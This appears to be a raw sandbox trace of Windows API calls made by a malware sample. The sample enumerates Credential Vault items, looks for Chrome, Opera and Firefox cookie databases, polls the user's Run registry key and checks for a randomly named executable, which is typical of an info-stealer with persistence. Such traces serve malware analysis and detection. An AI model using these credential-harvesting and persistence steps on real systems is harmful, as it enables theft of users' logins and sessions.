0xffffffff [0174.636] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="vaultcli.dll", BaseAddress=0x14e354 | out: BaseAddress=0x14e354*=0x75220000) returned 0x0 [0174.809] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\179M615Q\\179logrv.ini", NtPathName=0x14e224, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\179M615Q\\179logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.809] NtCreateFile (in: FileHandle=0x14e244, DesiredAccess=0x120089, ObjectAttributes=0x14e20c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\179M615Q\\179logrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e22c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e244*=0x0, IoStatusBlock=0x14e22c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0174.809] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0174.809] VaultEnumerateVaults () returned 0x0 [0175.384] VaultOpenVault () returned 0x0 [0175.385] VaultEnumerateItems () returned 0x0 [0175.385] VaultFree () returned 0x0 [0175.385] VaultCloseVault () returned 0x0 [0175.386] VaultOpenVault () returned 0x0 [0175.387] VaultEnumerateItems () returned 0x0 [0175.390] VaultFree () returned 0x0 [0175.390] VaultCloseVault () returned 0x0 [0175.391] VaultFree () returned 0x1 [0175.391] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0x14e178 | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0175.391] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", NtPathName=0x14e148, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.391] NtCreateFile (in: FileHandle=0x14e168, DesiredAccess=0x120089, ObjectAttributes=0x14e130*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e150, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e168*=0x0, IoStatusBlock=0x14e150*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.392] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.392] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x14e104 | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0175.392] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies", NtPathName=0x14e148, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.392] NtCreateFile (in: FileHandle=0x14e168, DesiredAccess=0x120089, ObjectAttributes=0x14e130*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e150, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e168*=0x0, IoStatusBlock=0x14e150*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.392] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.392] RtlDosPathNameToNtPathName_U (in: DosPathName="\\Cookies.sqlite", NtPathName=0x14e13c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Cookies.sqlite", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.393] NtCreateFile (in: FileHandle=0x14e15c, DesiredAccess=0x120089, ObjectAttributes=0x14e124*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Cookies.sqlite", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e144, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e15c*=0x0, IoStatusBlock=0x14e144*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0175.393] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.393] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.393] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.393] NtClose (Handle=0x14c) returned 0x0 [0175.394] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.394] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.394] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.394] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.394] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.394] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.403] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.407] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.407] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.407] NtClose (Handle=0x14c) returned 0x0 [0175.407] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.407] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.407] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.407] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.408] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.408] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.412] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.423] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.423] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.423] NtClose (Handle=0x14c) returned 0x0 [0175.423] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.423] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.423] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.423] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.423] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.423] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.428] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.438] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.438] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.438] NtClose (Handle=0x14c) returned 0x0 [0175.438] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.438] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.438] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.439] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.439] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.439] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.443] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.454] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.454] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.454] NtClose (Handle=0x14c) returned 0x0 [0175.454] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.454] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.454] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.455] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e60c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.455] NtCreateFile (in: FileHandle=0x14e62c, DesiredAccess=0x120089, ObjectAttributes=0x14e5f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e614, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e62c*=0x0, IoStatusBlock=0x14e614*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0175.455] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x787098) returned 1 [0175.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0175.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0175.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0175.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0175.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0175.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0175.459] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0175.473] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x14c) returned 0x0 [0175.473] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0175.473] NtClose (Handle=0x14c) returned 0x0 [0175.473] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtPathName=0x14e3f0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.473] NtCreateFile (in: FileHandle=0x14e410, DesiredAccess=0x120089, ObjectAttributes=0x14e3d8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x14e3f8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x14e410*=0x0, IoStatusBlock=0x14e3f8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a 